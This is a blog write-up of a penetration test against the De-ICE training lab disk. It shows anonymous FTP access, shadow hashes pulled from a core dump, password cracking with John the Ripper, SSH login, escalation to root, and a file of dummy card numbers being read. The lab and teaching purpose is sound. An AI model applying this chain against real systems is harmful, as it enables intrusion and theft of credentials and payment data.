
Saturday, November 10, 2012

Lab 3 : Pentesting On Lab Disk #1.10 v1.0

1. Information Gathering

The first step is gathering information about the target. Here I will scan first to gather information about the target, and for that I use nmap.


We found the target's IP address, namely 192.168.1.110, and several running services: ftp on port 21, ssh on port 22, http on port 80, and ipp on port 631.

2. Service Enumeration
The information gathering section already showed the running services, but I want a description of the services and ports, so I run nmap again using <options> :


As in the screenshot above, nmap describes that :
port 21   ftp ==> anonymous login is allowed
port 22   ssh ==> ssh login
port 80   http ==> Apache httpd version 2.2.4
port 631 ipp  ==> provides a standard network protocol for remote printing

3. Vulnerability Assessment
Based on the information gathering and service enumeration above, I found vulnerabilities on the target system, namely in ftp, ssh, and http.

- HTTP
Open the target's IP address in a browser and see what is inside.



See the section I marked: a description of the system admin and crew, which also shows their email addresses.

Now I will log in to ftp using the user anonymous and the password anonymous.

root@bt:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1000     513           160 Mar 15  2007 download
drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1000     513           160 Mar 15  2007 .
drwxr-xr-x    4 0        0              80 Mar 15  2007 ..
drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc
drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt
drwxr-xr-x   10 1000     513           400 Mar 15  2007 root
drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr
drwxr-xr-x    3 1000     513            80 Mar 15  2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    6 1000     513           340 Mar 15  2007 .
drwxr-xr-x    7 1000     513           160 Mar 15  2007 ..
drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11
-rw-r--r--    1 1000     513        362436 Mar 03  2007 core
drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts
-rw-r--r--    1 1000     513           780 Apr 30  2005 hosts
-rw-r--r--    1 1000     513           718 Jul 03  2005 inputrc
-rw-r--r--    1 1000     513          1296 Jun 10  2006 issue                                
-rw-r--r--    1 1000     513           183 Jun 23  2005 lisarc                               
-rw-r--r--    1 1000     513            56 Oct 21  2004 localtime                            
lrwxrwxrwx    1 1000     513            23 Nov 09 14:18 localtime-copied-from -> /usr/share/zoneinfo/GMT
-rw-r--r--    1 1000     513         10289 Dec 31  2003 login.defs
-rw-r--r--    1 1000     513             1 Dec 31  2003 motd-slax
drwxr-xr-x    2 1000     513           100 Mar 15  2007 profile.d
drwxr-xr-x    2 1000     513           220 Mar 15  2007 rc.d
-rw-r--r--    1 1000     513           440 Jul 18  2006 shadow
226 Directory send OK.
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.02 secs (18602.1 kB/s)
ftp> exit
421 Timeout.



Above is the process of viewing the contents of the ftp folder. There I found the file core (see the yellow block); a core file stores core dump data (memory, storage, and debugging dumps). Then I retrieved the core file using the get command (as above), and it is automatically saved in our current directory (root's home, ~).

Check our directory


And check the contents of the core file

root@bt:~# strings core
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d                                                                   
CORE                                                                                         
CORE
FLINUX                                                                                       
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks                                                                                         
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include                                   
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false                                                                          
HZ=100                                                                                       
HOSTNAME=slax.slackware-live.cd                                                              
SHELL=/bin/bash
TERM=xterm                                                                                   
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0          
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts                                                                          
WINDOWID=25165831
HUSHLOGIN=FALSE                                                                              
QTDIR=/usr/lib/qt
LC_ALL=C                                                                                     
KDE_FULL_SESSION=true
USER=root
<continue>
. . . . . . . . . .  . . .
. . . . . . .  . . . . . .
.gnu.version_d
.text
.note
.eh_frame_hdr
.eh_frame
.dynamic
.useless
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::


At the end of the content are the password hashes of the De-ICE users. We cannot log in using the password hashes as shown above, because they are one-way hashes rather than the plaintext passwords.

4. Exploit
After we have obtained the password hashes, we have to crack them to recover the passwords. Here I use JTR (John the Ripper). For a description of JTR, please visit here.

The password hashes :
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::


We need to filter this, because we only need the user and password hash entries to log in to ssh later. Like this :
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::


OK, we have four users and their hashed passwords.

Next is cracking with John the Ripper. Before we start cracking, we must have a wordlist to use as JTR's dictionary.

Now open John the Ripper on your BackTrack at /pentest/passwords/john
To see how to use it, you can type john


Now start cracking; this process may take a long time depending on your computer's specifications :D


Above we successfully cracked the passwords and found three users and their passwords, like so :
Complexity       (root)
Diatomaceous     (ccoffee)
Zymurgy          (bbanter)

After that, try logging in to ssh. I did not take a screenshot of this because it is too long, so I copied it from the konsole.

I log in as user bbanter
root@bt:~# ssh bbanter@192.168.1.110
bbanter@192.168.1.110's password: ********
Linux 2.6.16.
bbanter@slax:~$
Then switch to root (highest privilege)
bbanter@slax:~$ su
Password: **********
root@slax:/home/bbanter# 
OMG !! Now I am root on the system :D

What do you do after you successfully log in as root ? It's up to you :D

Below is what I did, namely looking around at the contents of the system
root@slax:/home/bbanter# ls
root@slax:/home/bbanter# cd /home/
root@slax:/home# 
root@slax:/home# ls
aadams  bbanter  ccoffee  ftp  root
root@slax:/home# cd root/ 
root@slax:/home/root# ls -lh
total 0
root@slax:/home/root# ls
root@slax:/home/root# ls -a
.  ..  .save  .screenrc
root@slax:/home/root# cd .screenrc 
bash: cd: .screenrc: Not a directory
root@slax:/home/root# cat .screenrc 
#
# Example of a user's .screenrc file
#

# This is how one can set a reattach password:
# password ODSJQf.4IJN7E    # "1234"

# no annoying audible bell, please
vbell on

# detach on hangup
autodetach on

# don't display the copyright page
startup_message off

# emulate .logout message
pow_detach_msg "Screen session of \$LOGNAME \$:cr:\$:nl:ended."

# advertise hardstatus support to $TERMCAP
# termcapinfo  * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'

# make the shell in every window a login shell
#shell -$SHELL

# autoaka testing
# shellaka '> |tcsh'
# shellaka '$ |sh'

# set every new windows hardstatus line to somenthing descriptive
# defhstatus "screen: ^En (^Et)"

defscrollback 1000

# don't kill window after the process died
# zombie "^["

# enable support for the "alternate screen" capability in all windows
# altscreen on

################
#
# xterm tweaks
#

#xterm understands both im/ic and doesn't have a status line.
#Note: Do not specify im and ic in the real termcap/info file as
#some programs (e.g. vi) will not work anymore.
termcap  xterm hs@:cs=\E[%i%d;%dr:im=\E[4h:ei=\E[4l
terminfo xterm hs@:cs=\E[%i%p1%d;%p2%dr:im=\E[4h:ei=\E[4l

#80/132 column switching must be enabled for ^AW to work
#change init sequence to not switch width
termcapinfo  xterm Z0=\E[?3h:Z1=\E[?3l:is=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;4;6l

# Make the output buffer large for (fast) xterms.
#termcapinfo xterm* OL=10000
termcapinfo xterm* OL=100

# tell screen that xterm can switch to dark background and has function
# keys.
termcapinfo xterm 'VR=\E[?5h:VN=\E[?5l'
termcapinfo xterm 'k1=\E[11~:k2=\E[12~:k3=\E[13~:k4=\E[14~'
termcapinfo xterm 'kh=\EOH:kI=\E[2~:kD=\E[3~:kH=\EOF:kP=\E[5~:kN=\E[6~'

# special xterm hardstatus: use the window title.
termcapinfo xterm 'hs:ts=\E]2;:fs=\007:ds=\E]2;screen\007'

#terminfo xterm 'vb=\E[?5h$<200/>\E[?5l'
termcapinfo xterm 'vi=\E[?25l:ve=\E[34h\E[?25h:vs=\E[34l'

# emulate part of the 'K' charset
termcapinfo   xterm 'XC=K%,%\E(B,[\304,\\\\\326,]\334,{\344,|\366,}\374,~\337'

# xterm-52 tweaks:
# - uses background color for delete operations
termcapinfo xterm* be

################
#
# wyse terminals
#

#wyse-75-42 must have flow control (xo = "terminal uses xon/xoff")
#essential to have it here, as this is a slow terminal.
termcapinfo wy75-42 xo:hs@

# New termcap sequences for cursor application mode.
termcapinfo wy* CS=\E[?1h:CE=\E[?1l:vi=\E[?25l:ve=\E[?25h:VR=\E[?5h:VN=\E[?5l:cb=\E[1K:CD=\E[1J

################
#
# other terminals
#

# make hp700 termcap/info better
termcapinfo  hp700 'Z0=\E[?3h:Z1=\E[?3l:hs:ts=\E[62"p\E[0$~\E[2$~\E[1$}:fs=\E[0}\E[61"p:ds=\E[62"p\E[1$~\E[61"p:ic@'

# Extend the vt100 desciption by some sequences.
termcap  vt100* ms:AL=\E[%dL:DL=\E[%dM:UP=\E[%dA:DO=\E[%dB:LE=\E[%dD:RI=\E[%dC
terminfo vt100* ms:AL=\E[%p1%dL:DL=\E[%p1%dM:UP=\E[%p1%dA:DO=\E[%p1%dB:LE=\E[%p1%dD:RI=\E[%p1%dC
termcapinfo linux C8
# old rxvt versions also need this
# termcapinfo rxvt C8


################
#
# keybindings
#

#remove some stupid / dangerous key bindings
bind k
bind ^k
bind .
bind ^\
bind \\
bind ^h
bind h
#make them better
bind 'K' kill
bind 'I' login on
bind 'O' login off
bind '}' history

# Yet another hack:
# Prepend/append register [/] to the paste if ^a^] is pressed.
# This lets me have autoindent mode in vi.
register [ "\033:se noai\015a"
register ] "\033:se ai\015a"
bind ^] paste [.]

################
#
# default windows
#

# screen -t local 0
# screen -t mail 1 mutt
# screen -t 40 2 rlogin server

# caption always "%3n %t%? @%u%?%? [%h]%?%=%c"
# hardstatus alwaysignore
# hardstatus alwayslastline "%Lw"

# bind = resize =
# bind + resize +1
# bind - resize -1
# bind _ resize max
#
# defnonblock 1
# blankerprg rain -d 100
# idle 30 blanker
root@slax:/home/root# ls -a
.  ..  .save  .screenrc
root@slax:/home/root# cat .save/
cat: .save/: Is a directory
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls
copy.sh  customer_account.csv  customer_account.csv.enc
root@slax:/home/root/.save# cat cus
customer_account.csv      customer_account.csv.enc  
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save# 

Hehe.. I found the customer account records (card numbers) shown above :D

Finish ^^


